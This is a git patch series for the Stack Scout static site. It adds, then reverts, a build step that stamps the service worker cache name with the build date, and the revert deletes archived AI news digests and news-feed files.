          Verdict language

          diff --git a/radar/index.html b/radar/index.html index 4bc907f..cbc054e 100644 --- a/radar/index.html +++ b/radar/index.html @@ -164,7 +164,7 @@

          GitHub skills ecosystem

          diff --git a/scripts/build-stackscout.js b/scripts/build-stackscout.js index d390a74..e4a6b8a 100644 --- a/scripts/build-stackscout.js +++ b/scripts/build-stackscout.js @@ -1273,6 +1273,21 @@ ${routes.map((route) => ` ${PUBLIC_BASE_URL}${route}`).jo ` } +function updateServiceWorkerCacheName() { + const serviceWorkerPath = 'service-worker.js' + const current = fs.readFileSync(path.join(ROOT_DIR, serviceWorkerPath), 'utf8') + const next = current.replace( + /const CACHE_NAME = ['"]stackscout-\d{4}-\d{2}-\d{2}['"]/, + `const CACHE_NAME = 'stackscout-${GENERATED_AT}'`, + ) + + if (next === current) { + throw new Error('service-worker.js cache name was not updated; expected stackscout-YYYY-MM-DD declaration.') + } + + writeFile(serviceWorkerPath, next) +} + function main() { const privatePreviewExport = resolvePrivatePreviewExportPath() const site = readJson('site-source.json') @@ -1333,6 +1348,7 @@ function main() { ] writeFile('sitemap.xml', buildSitemap(sitemapRoutes)) + updateServiceWorkerCacheName() console.log( `Stack Scout build complete. Generated ${tools.length} tool pages, ${categories.length} category pages, and ${updates.length} updates.`, ) diff --git a/service-worker.js b/service-worker.js index 9ff0fb2..65ca957 100644 --- a/service-worker.js +++ b/service-worker.js @@ -1,4 +1,4 @@ -const CACHE_NAME = 'stackscout-2026-06-04' +const CACHE_NAME = 'stackscout-2026-06-06' const APP_SHELL = [ '', 'index.html', diff --git a/tools/anthropic-api/index.html b/tools/anthropic-api/index.html index 9274b4a..de44888 100644 --- a/tools/anthropic-api/index.html +++ b/tools/anthropic-api/index.html @@ -311,7 +311,7 @@

          n8n

          diff --git a/tools/canvas-planner/index.html b/tools/canvas-planner/index.html index a333ebe..d247d4c 100644 --- a/tools/canvas-planner/index.html +++ b/tools/canvas-planner/index.html @@ -277,7 +277,7 @@

          SyncPad

          diff --git a/tools/gh-cli/index.html b/tools/gh-cli/index.html index 3206296..f810be3 100644 --- a/tools/gh-cli/index.html +++ b/tools/gh-cli/index.html @@ -277,7 +277,7 @@

          Wrangler

          diff --git a/tools/github-mcp-server/index.html b/tools/github-mcp-server/index.html index cedcfb4..34f46cc 100644 --- a/tools/github-mcp-server/index.html +++ b/tools/github-mcp-server/index.html @@ -311,7 +311,7 @@

          Wrangler

          diff --git a/tools/hugging-face/index.html b/tools/hugging-face/index.html index 8e6dee2..437555c 100644 --- a/tools/hugging-face/index.html +++ b/tools/hugging-face/index.html @@ -311,7 +311,7 @@

          GitHub MCP Server

          diff --git a/tools/make/index.html b/tools/make/index.html index cb9981e..157e8cc 100644 --- a/tools/make/index.html +++ b/tools/make/index.html @@ -311,7 +311,7 @@

          Anthropic API

          diff --git a/tools/n8n/index.html b/tools/n8n/index.html index 2b209f0..e546569 100644 --- a/tools/n8n/index.html +++ b/tools/n8n/index.html @@ -311,7 +311,7 @@

          Anthropic API

          diff --git a/tools/openai-api/index.html b/tools/openai-api/index.html index b5b70ae..b717fbb 100644 --- a/tools/openai-api/index.html +++ b/tools/openai-api/index.html @@ -345,7 +345,7 @@

          Playwright MCP

          diff --git a/tools/perplexity/index.html b/tools/perplexity/index.html index 226bd85..cc49f23 100644 --- a/tools/perplexity/index.html +++ b/tools/perplexity/index.html @@ -277,7 +277,7 @@

          OpenAI API

          diff --git a/tools/playwright-mcp/index.html b/tools/playwright-mcp/index.html index d2b6b07..59e65bd 100644 --- a/tools/playwright-mcp/index.html +++ b/tools/playwright-mcp/index.html @@ -311,7 +311,7 @@

          Anthropic API

          diff --git a/tools/signal-stack/index.html b/tools/signal-stack/index.html index df9fb37..546b067 100644 --- a/tools/signal-stack/index.html +++ b/tools/signal-stack/index.html @@ -255,7 +255,7 @@

          Strudel Studio

          diff --git a/tools/strudel-studio/index.html b/tools/strudel-studio/index.html index dbd10d1..0d7dbc5 100644 --- a/tools/strudel-studio/index.html +++ b/tools/strudel-studio/index.html @@ -277,7 +277,7 @@

          OpenAI API

          diff --git a/tools/syncpad/index.html b/tools/syncpad/index.html index a5b9964..741d63b 100644 --- a/tools/syncpad/index.html +++ b/tools/syncpad/index.html @@ -221,7 +221,7 @@

          Canvas Planner

          diff --git a/tools/wrangler/index.html b/tools/wrangler/index.html index 2bf1dc5..32cd6f1 100644 --- a/tools/wrangler/index.html +++ b/tools/wrangler/index.html @@ -277,7 +277,7 @@

          Playwright MCP

          diff --git a/updates/index.html b/updates/index.html index a824e2d..63d8716 100644 --- a/updates/index.html +++ b/updates/index.html @@ -364,7 +364,7 @@

          Wrangler 4.58.0 improved command grouping and auth ergonomics

          From 64558b507fce2ea18213af371e03b9b6ebbbc6d7 Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Sat, 6 Jun 2026 13:41:53 +0100 Subject: [PATCH 4/5] Revert "fix: refresh service worker cache during build" This reverts commit 52fed771d49f5337a14e3256f26d97ce92a0243b. --- catalog/index.html | 2 +- categories/apis/index.html | 2 +- categories/clis/index.html | 2 +- categories/desktop-apps/index.html | 2 +- categories/index.html | 2 +- categories/mcps/index.html | 2 +- categories/web-apps/index.html | 2 +- categories/web-services/index.html | 2 +- categories/websites/index.html | 2 +- collections/index.html | 2 +- data/categories-manifest.json | 4 +- data/collections-manifest.json | 4 +- data/digest-2026-03-15.md | 23 --- data/digest-2026-03-16.md | 53 ------ data/digest-2026-03-17.md | 107 ----------- data/digest-2026-03-18.md | 71 -------- data/digest-2026-03-19.md | 39 ---- data/digest-2026-03-20.md | 45 ----- data/digest-2026-03-21.md | 49 ----- data/digest-2026-03-22.md | 49 ----- data/digest-2026-03-23.md | 25 --- data/digest-2026-03-24.md | 65 ------- data/digest-2026-03-25.md | 53 ------ data/digest-2026-03-26.md | 51 ------ data/digest-2026-03-27.md | 35 ---- data/digest-2026-03-28.md | 29 --- data/digest-2026-03-29.md | 23 --- data/digest-2026-03-30.md | 19 -- data/digest-2026-03-31.md | 125 ------------- data/digest-2026-04-01.md | 95 ---------- data/digest-2026-04-02.md | 71 -------- data/digest-2026-04-03.md | 47 ----- data/digest-2026-04-04.md | 39 ---- data/digest-2026-04-05.md | 125 ------------- data/digest-2026-04-06.md | 119 ------------ data/digest-2026-04-07.md | 125 ------------- data/digest-2026-04-08.md | 125 ------------- data/digest-2026-04-09.md | 123 ------------- data/digest-2026-04-10.md | 123 ------------- data/digest-2026-04-11.md | 125 ------------- data/digest-2026-04-12.md | 83 --------- data/digest-2026-04-14.md | 125 ------------- data/digest-2026-04-15.md | 125 ------------- data/digest-2026-04-16.md | 123 ------------- data/digest-2026-04-17.md | 123 ------------- data/digest-2026-04-18.md | 125 ------------- data/digest-2026-04-19.md | 119 ------------ data/digest-2026-04-20.md | 123 ------------- data/digest-2026-04-21.md | 126 ------------- data/digest-2026-04-22.md | 117 ------------ data/digest-2026-04-23.md | 103 ----------- data/digest-2026-04-25.md | 125 ------------- data/digest-2026-04-26.md | 127 ------------- data/digest-2026-04-27.md | 125 ------------- data/digest-2026-04-28.md | 123 ------------- data/digest-2026-04-29.md | 125 ------------- data/digest-2026-04-30.md | 117 ------------ data/digest-2026-05-01.md | 123 ------------- data/digest-2026-05-02.md | 125 ------------- data/digest-2026-05-03.md | 123 ------------- data/digest-2026-05-04.md | 125 ------------- data/digest-2026-05-05.md | 125 ------------- data/digest-2026-05-06.md | 123 ------------- data/digest-2026-05-07.md | 123 ------------- data/digest-2026-05-08.md | 125 ------------- data/digest-2026-05-09.md | 123 ------------- data/digest-2026-05-10.md | 125 ------------- data/digest-2026-05-11.md | 123 ------------- data/digest-2026-05-12.md | 125 ------------- data/digest-2026-05-13.md | 125 ------------- data/digest-2026-05-14.md | 125 ------------- data/digest-2026-05-15.md | 123 ------------- data/digest-2026-05-16.md | 123 ------------- data/digest-2026-05-17.md | 125 ------------- data/digest-2026-05-18.md | 125 ------------- data/digest-2026-05-19.md | 117 ------------ data/digest-2026-05-20.md | 107 ----------- data/digest-2026-05-21.md | 119 ------------ data/digest-2026-05-22.md | 117 ------------ data/digest-2026-05-23.md | 121 ------------ data/digest-2026-05-24.md | 125 ------------- data/digest-2026-05-25.md | 123 ------------- data/digest-2026-05-26.md | 121 ------------ data/digest-2026-05-27.md | 123 ------------- data/digest-2026-05-28.md | 121 ------------ data/digest-2026-05-29.md | 111 ----------- data/digest-2026-05-30.md | 103 ----------- data/digest-2026-05-31.md | 11 -- data/digest-2026-06-01.md | 35 ---- data/digest-2026-06-02.md | 29 --- data/digest-2026-06-03.md | 41 ----- data/digest-2026-06-04.md | 35 ---- data/digest-2026-06-05.md | 35 ---- data/digest-2026-06-06.md | 5 - data/methodology-manifest.json | 4 +- data/news-feed-2026-03-15.json | 55 ------ data/news-feed-2026-03-16.json | 134 -------------- data/news-feed-2026-03-17.json | 237 ------------------------ data/news-feed-2026-03-18.json | 160 ---------------- data/news-feed-2026-03-19.json | 87 --------- data/news-feed-2026-03-20.json | 102 ----------- data/news-feed-2026-03-21.json | 115 ------------ data/news-feed-2026-03-22.json | 115 ------------ data/news-feed-2026-03-23.json | 55 ------ data/news-feed-2026-03-24.json | 145 --------------- data/news-feed-2026-03-25.json | 115 ------------ data/news-feed-2026-03-26.json | 119 ------------ data/news-feed-2026-03-27.json | 87 --------- data/news-feed-2026-03-28.json | 70 ------- data/news-feed-2026-03-29.json | 55 ------ data/news-feed-2026-03-30.json | 40 ---- data/news-feed-2026-03-31.json | 271 --------------------------- data/news-feed-2026-04-01.json | 253 -------------------------- data/news-feed-2026-04-02.json | 181 ------------------ data/news-feed-2026-04-03.json | 119 ------------ data/news-feed-2026-04-04.json | 87 --------- data/news-feed-2026-04-05.json | 261 -------------------------- data/news-feed-2026-04-06.json | 263 --------------------------- data/news-feed-2026-04-07.json | 253 -------------------------- data/news-feed-2026-04-08.json | 269 --------------------------- data/news-feed-2026-04-09.json | 253 -------------------------- data/news-feed-2026-04-10.json | 245 ------------------------- data/news-feed-2026-04-11.json | 249 ------------------------- data/news-feed-2026-04-12.json | 168 ----------------- data/news-feed-2026-04-14.json | 255 -------------------------- data/news-feed-2026-04-15.json | 255 -------------------------- data/news-feed-2026-04-16.json | 259 -------------------------- data/news-feed-2026-04-17.json | 263 --------------------------- data/news-feed-2026-04-18.json | 249 ------------------------- data/news-feed-2026-04-19.json | 245 ------------------------- data/news-feed-2026-04-20.json | 251 ------------------------- data/news-feed-2026-04-21.json | 261 -------------------------- data/news-feed-2026-04-22.json | 247 ------------------------- data/news-feed-2026-04-23.json | 207 --------------------- data/news-feed-2026-04-25.json | 249 ------------------------- data/news-feed-2026-04-26.json | 265 --------------------------- data/news-feed-2026-04-27.json | 263 --------------------------- data/news-feed-2026-04-28.json | 269 --------------------------- data/news-feed-2026-04-29.json | 265 --------------------------- data/news-feed-2026-04-30.json | 255 -------------------------- data/news-feed-2026-05-01.json | 265 --------------------------- data/news-feed-2026-05-02.json | 273 ---------------------------- data/news-feed-2026-05-03.json | 247 ------------------------- data/news-feed-2026-05-04.json | 263 --------------------------- data/news-feed-2026-05-05.json | 269 --------------------------- data/news-feed-2026-05-06.json | 263 --------------------------- data/news-feed-2026-05-07.json | 263 --------------------------- data/news-feed-2026-05-08.json | 261 -------------------------- data/news-feed-2026-05-09.json | 257 -------------------------- data/news-feed-2026-05-10.json | 253 -------------------------- data/news-feed-2026-05-11.json | 263 --------------------------- data/news-feed-2026-05-12.json | 259 -------------------------- data/news-feed-2026-05-13.json | 277 ---------------------------- data/news-feed-2026-05-14.json | 277 ---------------------------- data/news-feed-2026-05-15.json | 259 -------------------------- data/news-feed-2026-05-16.json | 275 ---------------------------- data/news-feed-2026-05-17.json | 267 --------------------------- data/news-feed-2026-05-18.json | 273 ---------------------------- data/news-feed-2026-05-19.json | 275 ---------------------------- data/news-feed-2026-05-20.json | 261 -------------------------- data/news-feed-2026-05-21.json | 277 ---------------------------- data/news-feed-2026-05-22.json | 257 -------------------------- data/news-feed-2026-05-23.json | 251 ------------------------- data/news-feed-2026-05-24.json | 269 --------------------------- data/news-feed-2026-05-25.json | 279 ---------------------------- data/news-feed-2026-05-26.json | 283 ----------------------------- data/news-feed-2026-05-27.json | 265 --------------------------- data/news-feed-2026-05-28.json | 271 --------------------------- data/news-feed-2026-05-29.json | 259 -------------------------- data/news-feed-2026-05-30.json | 243 ------------------------- data/news-feed-2026-05-31.json | 25 --- data/news-feed-2026-06-01.json | 85 --------- data/news-feed-2026-06-02.json | 72 -------- data/news-feed-2026-06-03.json | 102 ----------- data/news-feed-2026-06-04.json | 86 --------- data/news-feed-2026-06-05.json | 84 --------- data/news-feed-2026-06-06.json | 6 - data/news-feed-latest.json | 6 - data/page-registry.json | 2 +- data/radar-manifest.json | 4 +- data/tools-manifest.json | 4 +- data/updates-manifest.json | 4 +- index.html | 2 +- method/index.html | 2 +- radar/index.html | 2 +- scripts/build-stackscout.js | 16 -- service-worker.js | 2 +- tools/anthropic-api/index.html | 2 +- tools/canvas-planner/index.html | 2 +- tools/gh-cli/index.html | 2 +- tools/github-mcp-server/index.html | 2 +- tools/hugging-face/index.html | 2 +- tools/make/index.html | 2 +- tools/n8n/index.html | 2 +- tools/openai-api/index.html | 2 +- tools/perplexity/index.html | 2 +- tools/playwright-mcp/index.html | 2 +- tools/signal-stack/index.html | 2 +- tools/strudel-studio/index.html | 2 +- tools/syncpad/index.html | 2 +- tools/wrangler/index.html | 2 +- updates/index.html | 2 +- 202 files changed, 42 insertions(+), 24944 deletions(-) delete mode 100644 data/digest-2026-03-15.md delete mode 100644 data/digest-2026-03-16.md delete mode 100644 data/digest-2026-03-17.md delete mode 100644 data/digest-2026-03-18.md delete mode 100644 data/digest-2026-03-19.md delete mode 100644 data/digest-2026-03-20.md delete mode 100644 data/digest-2026-03-21.md delete mode 100644 data/digest-2026-03-22.md delete mode 100644 data/digest-2026-03-23.md delete mode 100644 data/digest-2026-03-24.md delete mode 100644 data/digest-2026-03-25.md delete mode 100644 data/digest-2026-03-26.md delete mode 100644 data/digest-2026-03-27.md delete mode 100644 data/digest-2026-03-28.md delete mode 100644 data/digest-2026-03-29.md delete mode 100644 data/digest-2026-03-30.md delete mode 100644 data/digest-2026-03-31.md delete mode 100644 data/digest-2026-04-01.md delete mode 100644 data/digest-2026-04-02.md delete mode 100644 data/digest-2026-04-03.md delete mode 100644 data/digest-2026-04-04.md delete mode 100644 data/digest-2026-04-05.md delete mode 100644 data/digest-2026-04-06.md delete mode 100644 data/digest-2026-04-07.md delete mode 100644 data/digest-2026-04-08.md delete mode 100644 data/digest-2026-04-09.md delete mode 100644 data/digest-2026-04-10.md delete mode 100644 data/digest-2026-04-11.md delete mode 100644 data/digest-2026-04-12.md delete mode 100644 data/digest-2026-04-14.md delete mode 100644 data/digest-2026-04-15.md delete mode 100644 data/digest-2026-04-16.md delete mode 100644 data/digest-2026-04-17.md delete mode 100644 data/digest-2026-04-18.md delete mode 100644 data/digest-2026-04-19.md delete mode 100644 data/digest-2026-04-20.md delete mode 100644 data/digest-2026-04-21.md delete mode 100644 data/digest-2026-04-22.md delete mode 100644 data/digest-2026-04-23.md delete mode 100644 data/digest-2026-04-25.md delete mode 100644 data/digest-2026-04-26.md delete mode 100644 data/digest-2026-04-27.md delete mode 100644 data/digest-2026-04-28.md delete mode 100644 data/digest-2026-04-29.md delete mode 100644 data/digest-2026-04-30.md delete mode 100644 data/digest-2026-05-01.md delete mode 100644 data/digest-2026-05-02.md delete mode 100644 data/digest-2026-05-03.md delete mode 100644 data/digest-2026-05-04.md delete mode 100644 data/digest-2026-05-05.md delete mode 100644 data/digest-2026-05-06.md delete mode 100644 data/digest-2026-05-07.md delete mode 100644 data/digest-2026-05-08.md delete mode 100644 data/digest-2026-05-09.md delete mode 100644 data/digest-2026-05-10.md delete mode 100644 data/digest-2026-05-11.md delete mode 100644 data/digest-2026-05-12.md delete mode 100644 data/digest-2026-05-13.md delete mode 100644 data/digest-2026-05-14.md delete mode 100644 data/digest-2026-05-15.md delete mode 100644 data/digest-2026-05-16.md delete mode 100644 data/digest-2026-05-17.md delete mode 100644 data/digest-2026-05-18.md delete mode 100644 data/digest-2026-05-19.md delete mode 100644 data/digest-2026-05-20.md delete mode 100644 data/digest-2026-05-21.md delete mode 100644 data/digest-2026-05-22.md delete mode 100644 data/digest-2026-05-23.md delete mode 100644 data/digest-2026-05-24.md delete mode 100644 data/digest-2026-05-25.md delete mode 100644 data/digest-2026-05-26.md delete mode 100644 data/digest-2026-05-27.md delete mode 100644 data/digest-2026-05-28.md delete mode 100644 data/digest-2026-05-29.md delete mode 100644 data/digest-2026-05-30.md delete mode 100644 data/digest-2026-05-31.md delete mode 100644 data/digest-2026-06-01.md delete mode 100644 data/digest-2026-06-02.md delete mode 100644 data/digest-2026-06-03.md delete mode 100644 data/digest-2026-06-04.md delete mode 100644 data/digest-2026-06-05.md delete mode 100644 data/digest-2026-06-06.md delete mode 100644 data/news-feed-2026-03-15.json delete mode 100644 data/news-feed-2026-03-16.json delete mode 100644 data/news-feed-2026-03-17.json delete mode 100644 data/news-feed-2026-03-18.json delete mode 100644 data/news-feed-2026-03-19.json delete mode 100644 data/news-feed-2026-03-20.json delete mode 100644 data/news-feed-2026-03-21.json delete mode 100644 data/news-feed-2026-03-22.json delete mode 100644 data/news-feed-2026-03-23.json delete mode 100644 data/news-feed-2026-03-24.json delete mode 100644 data/news-feed-2026-03-25.json delete mode 100644 data/news-feed-2026-03-26.json delete mode 100644 data/news-feed-2026-03-27.json delete mode 100644 data/news-feed-2026-03-28.json delete mode 100644 data/news-feed-2026-03-29.json delete mode 100644 data/news-feed-2026-03-30.json delete mode 100644 data/news-feed-2026-03-31.json delete mode 100644 data/news-feed-2026-04-01.json delete mode 100644 data/news-feed-2026-04-02.json delete mode 100644 data/news-feed-2026-04-03.json delete mode 100644 data/news-feed-2026-04-04.json delete mode 100644 data/news-feed-2026-04-05.json delete mode 100644 data/news-feed-2026-04-06.json delete mode 100644 data/news-feed-2026-04-07.json delete mode 100644 data/news-feed-2026-04-08.json delete mode 100644 data/news-feed-2026-04-09.json delete mode 100644 data/news-feed-2026-04-10.json delete mode 100644 data/news-feed-2026-04-11.json delete mode 100644 data/news-feed-2026-04-12.json delete mode 100644 data/news-feed-2026-04-14.json delete mode 100644 data/news-feed-2026-04-15.json delete mode 100644 data/news-feed-2026-04-16.json delete mode 100644 data/news-feed-2026-04-17.json delete mode 100644 data/news-feed-2026-04-18.json delete mode 100644 data/news-feed-2026-04-19.json delete mode 100644 data/news-feed-2026-04-20.json delete mode 100644 data/news-feed-2026-04-21.json delete mode 100644 data/news-feed-2026-04-22.json delete mode 100644 data/news-feed-2026-04-23.json delete mode 100644 data/news-feed-2026-04-25.json delete mode 100644 data/news-feed-2026-04-26.json delete mode 100644 data/news-feed-2026-04-27.json delete mode 100644 data/news-feed-2026-04-28.json delete mode 100644 data/news-feed-2026-04-29.json delete mode 100644 data/news-feed-2026-04-30.json delete mode 100644 data/news-feed-2026-05-01.json delete mode 100644 data/news-feed-2026-05-02.json delete mode 100644 data/news-feed-2026-05-03.json delete mode 100644 data/news-feed-2026-05-04.json delete mode 100644 data/news-feed-2026-05-05.json delete mode 100644 data/news-feed-2026-05-06.json delete mode 100644 data/news-feed-2026-05-07.json delete mode 100644 data/news-feed-2026-05-08.json delete mode 100644 data/news-feed-2026-05-09.json delete mode 100644 data/news-feed-2026-05-10.json delete mode 100644 data/news-feed-2026-05-11.json delete mode 100644 data/news-feed-2026-05-12.json delete mode 100644 data/news-feed-2026-05-13.json delete mode 100644 data/news-feed-2026-05-14.json delete mode 100644 data/news-feed-2026-05-15.json delete mode 100644 data/news-feed-2026-05-16.json delete mode 100644 data/news-feed-2026-05-17.json delete mode 100644 data/news-feed-2026-05-18.json delete mode 100644 data/news-feed-2026-05-19.json delete mode 100644 data/news-feed-2026-05-20.json delete mode 100644 data/news-feed-2026-05-21.json delete mode 100644 data/news-feed-2026-05-22.json delete mode 100644 data/news-feed-2026-05-23.json delete mode 100644 data/news-feed-2026-05-24.json delete mode 100644 data/news-feed-2026-05-25.json delete mode 100644 data/news-feed-2026-05-26.json delete mode 100644 data/news-feed-2026-05-27.json delete mode 100644 data/news-feed-2026-05-28.json delete mode 100644 data/news-feed-2026-05-29.json delete mode 100644 data/news-feed-2026-05-30.json delete mode 100644 data/news-feed-2026-05-31.json delete mode 100644 data/news-feed-2026-06-01.json delete mode 100644 data/news-feed-2026-06-02.json delete mode 100644 data/news-feed-2026-06-03.json delete mode 100644 data/news-feed-2026-06-04.json delete mode 100644 data/news-feed-2026-06-05.json delete mode 100644 data/news-feed-2026-06-06.json delete mode 100644 data/news-feed-latest.json diff --git a/catalog/index.html b/catalog/index.html index 7d20915..6afa345 100644 --- a/catalog/index.html +++ b/catalog/index.html @@ -676,7 +676,7 @@

          SyncPad

          diff --git a/categories/apis/index.html b/categories/apis/index.html index b12e7da..4175a4c 100644 --- a/categories/apis/index.html +++ b/categories/apis/index.html @@ -175,7 +175,7 @@

          Anthropic API

          diff --git a/categories/clis/index.html b/categories/clis/index.html index aaabad1..81b6211 100644 --- a/categories/clis/index.html +++ b/categories/clis/index.html @@ -175,7 +175,7 @@

          Wrangler

          diff --git a/categories/desktop-apps/index.html b/categories/desktop-apps/index.html index 4df671e..c98a026 100644 --- a/categories/desktop-apps/index.html +++ b/categories/desktop-apps/index.html @@ -141,7 +141,7 @@

          SyncPad

          diff --git a/categories/index.html b/categories/index.html index 64bb4cf..c9acbbd 100644 --- a/categories/index.html +++ b/categories/index.html @@ -228,7 +228,7 @@

          Desktop Apps

          diff --git a/categories/mcps/index.html b/categories/mcps/index.html index 30e54c8..f862d74 100644 --- a/categories/mcps/index.html +++ b/categories/mcps/index.html @@ -175,7 +175,7 @@

          Playwright MCP

          diff --git a/categories/web-apps/index.html b/categories/web-apps/index.html index c35f706..cb3bc04 100644 --- a/categories/web-apps/index.html +++ b/categories/web-apps/index.html @@ -209,7 +209,7 @@

          Strudel Studio

          diff --git a/categories/web-services/index.html b/categories/web-services/index.html index 15036a9..cf70f1a 100644 --- a/categories/web-services/index.html +++ b/categories/web-services/index.html @@ -175,7 +175,7 @@

          Make

          diff --git a/categories/websites/index.html b/categories/websites/index.html index 1c17ed0..999627d 100644 --- a/categories/websites/index.html +++ b/categories/websites/index.html @@ -175,7 +175,7 @@

          Hugging Face

          diff --git a/collections/index.html b/collections/index.html index c24ecb3..ae64571 100644 --- a/collections/index.html +++ b/collections/index.html @@ -175,7 +175,7 @@

          From the Stack Scout Lab

          diff --git a/data/categories-manifest.json b/data/categories-manifest.json index 0e2dc9c..78826b4 100644 --- a/data/categories-manifest.json +++ b/data/categories-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Categories", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "categories": [ { "slug": "websites", diff --git a/data/collections-manifest.json b/data/collections-manifest.json index 871d976..c6f8013 100644 --- a/data/collections-manifest.json +++ b/data/collections-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Collections", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "collections": [ { "slug": "creator-stack", diff --git a/data/digest-2026-03-15.md b/data/digest-2026-03-15.md deleted file mode 100644 index 0386265..0000000 --- a/data/digest-2026-03-15.md +++ /dev/null @@ -1,23 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-15** | 3 stories | Auto-generated from 55 archived stories - ---- - -## [Show HN: Open-source playground to red-team AI agents with exploits published](https://github.com/fabraix/playground) -*Hacker News* | 15/03/2026 | Score: 0.88 -Tags: open_source - ---- - -## [Chrome DevTools MCP (2025)](https://developer.chrome.com/blog/chrome-devtools-mcp-debug-your-browser-session) -*Hacker News* | 15/03/2026 | Score: 0.81 -Tags: mcp - ---- - -## [Office.eu launches as Europe's sovereign office platform](https://office.eu/media/pressrelease-20260304) -*Hacker News* | 15/03/2026 | Score: 0.76 -Tags: product_launch - ---- - diff --git a/data/digest-2026-03-16.md b/data/digest-2026-03-16.md deleted file mode 100644 index 3d9554c..0000000 --- a/data/digest-2026-03-16.md +++ /dev/null @@ -1,53 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-16** | 8 stories | Auto-generated from 67 archived stories - ---- - -## [Apideck CLI – An AI-agent interface with much lower context consumption than MCP](https://www.apideck.com/blog/mcp-server-eating-context-window-cli-alternative) -*Hacker News* | 16/03/2026 | Score: 1.00 -Tags: mcp, cli_tool, agent_tool - ---- - -## [Speed at the cost of quality: Study of use of Cursor AI in open source projects](https://arxiv.org/abs/2511.04427) -*Hacker News* | 16/03/2026 | Score: 0.87 -Tags: open_source - ---- - -## [Nvidia Launches Vera CPU, Purpose-Built for Agentic AI](https://nvidianews.nvidia.com/news/nvidia-launches-vera-cpu-purpose-built-for-agentic-ai) -*Hacker News* | 16/03/2026 | Score: 0.84 -Tags: product_launch - ---- - -## [Nango (YC W23, API Access for Agents and Apps) Is Hiring](https://jobs.ashbyhq.com/Nango) -*Hacker News* | 16/03/2026 | Score: 0.82 -Tags: api_update - ---- - -## [SpiceCrypt: A Python library for decrypting LTspice encrypted model files](https://github.com/jtsylve/spice-crypt) -*Hacker News* | 15/03/2026 | Score: 0.76 -Tags: developer_tool - ---- - -## [Event Publisher enables event integration between Keycloak and OpenFGA](https://github.com/embesozzi/keycloak-openfga-event-publisher) -*Hacker News* | 16/03/2026 | Score: 0.70 -Tags: tool_update - ---- - -## [Lazycut: A simple terminal video trimmer using FFmpeg](https://github.com/emin-ozata/lazycut) -*Hacker News* | 16/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Leanstral: Open-source agent for trustworthy coding and formal proof engineering](https://mistral.ai/news/leanstral) -*Hacker News* | 16/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-17.md b/data/digest-2026-03-17.md deleted file mode 100644 index 8ea14b8..0000000 --- a/data/digest-2026-03-17.md +++ /dev/null @@ -1,107 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-17** | 15 stories | Auto-generated from 140 archived stories - ---- - -## [Show HN: Crust – A CLI framework for TypeScript and Bun](https://github.com/chenxin-yan/crust) -*Hacker News* | 17/03/2026 | Score: 0.84 -Tags: developer_tool, cli_tool - ---- - -## [World launches tool to verify humans behind AI shopping agents](https://techcrunch.com/2026/03/17/world-launches-tool-to-verify-humans-behind-ai-shopping-agents/) -*TechCrunch AI* | 17/03/2026 | Score: 1.00 -Tags: product_launch - -> As AI agents take the reins for online shoppers, Sam Altman's unconventional startup is looking to expand its verification offerings to support agentic commerce. - ---- - -## [Picsart now allows creators to ‘hire’ AI assistants through agent marketplace](https://techcrunch.com/2026/03/16/picsart-now-allows-creators-to-hire-ai-assistants-through-agent-marketplace/) -*TechCrunch AI* | 17/03/2026 | Score: 1.00 -Tags: agent_tool - -> Picsart's AI agent marketplace will launch with four agents, then add more agents each week. - ---- - -## [Nvidia’s version of OpenClaw could solve its biggest problem: security](https://techcrunch.com/2026/03/16/nvidias-version-of-openclaw-could-solve-its-biggest-problem-security/) -*TechCrunch AI* | 16/03/2026 | Score: 1.00 -Tags: agent_tool - -> Nvidia announced an open enterprise AI agent platform, called NemoClaw, that is built off of viral OpenClaw. - ---- - -## [How to watch Jensen Huang’s Nvidia GTC 2026 keynote — and what to expect](https://techcrunch.com/2026/03/16/nvidia-gtc-how-to-watch-jensen-huang-2026-keynote/) -*TechCrunch AI* | 16/03/2026 | Score: 1.00 -Tags: product_launch - -> GTC is Nvidia's flagship annual event, where the chipmaker typically announces new products, partnerships, and its vision for the future of computing. Huang's keynote will focus on Nvidia's role in the future of computing and AI. - ---- - -## [China’s OpenClaw Boom Is a Gold Rush for AI Companies](https://www.wired.com/story/china-is-going-all-in-on-openclaw/) -*Wired AI* | 13/03/2026 | Score: 0.91 -Tags: open_source - -> Hype around the open source agent is driving people to rent cloud servers and buy AI subscriptions just to try it, creating a windfall for tech companies. - ---- - -## [Mistral AI Releases Forge](https://mistral.ai/news/forge) -*Hacker News* | 17/03/2026 | Score: 0.79 -Tags: product_launch - ---- - -## [Show HN: Horizon – GPU-accelerated infinite-canvas terminal in Rust](https://github.com/peters/horizon) -*Hacker News* | 17/03/2026 | Score: 0.78 -Tags: cli_tool - ---- - -## [Chrome extension adjusts video speed based on how fast the speaker is talking](https://github.com/ywong137/speech-speed) -*Hacker News* | 13/03/2026 | Score: 0.78 -Tags: developer_tool - ---- - -## [Retraction: After a routine code rejection, an AI agent published a hit piece on someone by name](https://arstechnica.com/ai/2026/02/after-a-routine-code-rejection-an-ai-agent-published-a-hit-piece-on-someone-by-name/) -*Ars Technica AI* | 13/02/2026 | Score: 0.78 -Tags: agent_tool - -> This story has been retracted - ---- - -## [Node.js needs a virtual file system](https://blog.platformatic.dev/why-nodejs-needs-a-virtual-file-system) -*Hacker News* | 17/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Kagi Translate now supports LinkedIn Speak as an output language](https://translate.kagi.com/?from=en&to=LinkedIn+speak) -*Hacker News* | 17/03/2026 | Score: 0.70 -Tags: tool_update - ---- - -## [Reverse-engineering Viktor and making it Open Source](https://matijacniacki.com/blog/openviktor) -*Hacker News* | 17/03/2026 | Score: 0.68 -Tags: open_source - ---- - -## [Building a Shell](https://healeycodes.com/building-a-shell) -*Hacker News* | 17/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - -## [Show HN: Droeftoeter, a Terminal Coding Toy](https://github.com/whtspc/droeftoeter) -*Hacker News* | 13/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - diff --git 